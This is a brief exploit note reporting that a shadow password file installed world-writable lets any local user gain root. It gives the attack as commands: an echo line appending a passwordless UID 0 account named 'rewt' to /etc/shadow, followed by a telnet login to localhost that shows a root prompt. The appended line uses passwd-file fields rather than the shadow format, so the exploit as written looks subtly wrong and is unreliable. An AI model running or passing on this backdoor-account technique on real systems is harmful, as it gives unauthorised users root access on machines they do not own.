Exploit:

  The Shadow password file is installed writeable
  by default. Any user can add or modify entries
  giving them access to root.

 echo "rewt::0:0:blahness:/:/bin/sh" >> /etc/shadow
 telnet localhost
 Login:rewt
 #